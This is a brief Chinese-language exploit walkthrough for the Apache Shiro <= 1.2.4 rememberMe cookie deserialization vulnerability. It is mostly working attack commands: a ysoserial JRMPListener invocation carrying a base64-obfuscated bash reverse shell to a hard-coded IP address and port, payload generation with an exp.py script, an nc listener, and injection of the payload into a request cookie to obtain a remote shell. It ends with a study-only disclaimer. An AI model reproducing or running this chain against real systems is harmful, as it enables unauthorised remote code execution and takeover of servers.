0x01 影響版本
Apache Shiro <= 1.2.4
0x02 漏洞位置
http 請求包 cookie 中的 rememberMe 參數。
0x03 漏洞復現
- 在公網 vps 執行下列命令
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反 彈 shell 的命令"
這里的命令,需要使用 Java Runtime 配合 bash 編碼。
在線轉換地址
最終執行命令為:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4
"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80OS4yMzUuMjEyLjExOC8xMjM0IDA+JiAx}|{ base64,-d}|{bash,-i}"
理論上,這里的 CommonsCollections4 也可以換成 CommonsCollections2

- 使用 exp 生成 payload。(我這里是在本地 kali 下運行的)
python exp.py 公網 vps:1099

- 公網 vps 開啟 nc 監聽。

- 抓任意 http 數據包,在 cookie 中追加 payload。

- 反彈shell。

注:本文僅供參考學習,請勿在網上搞破壞,觸犯法律者應承擔相應的法律責任!
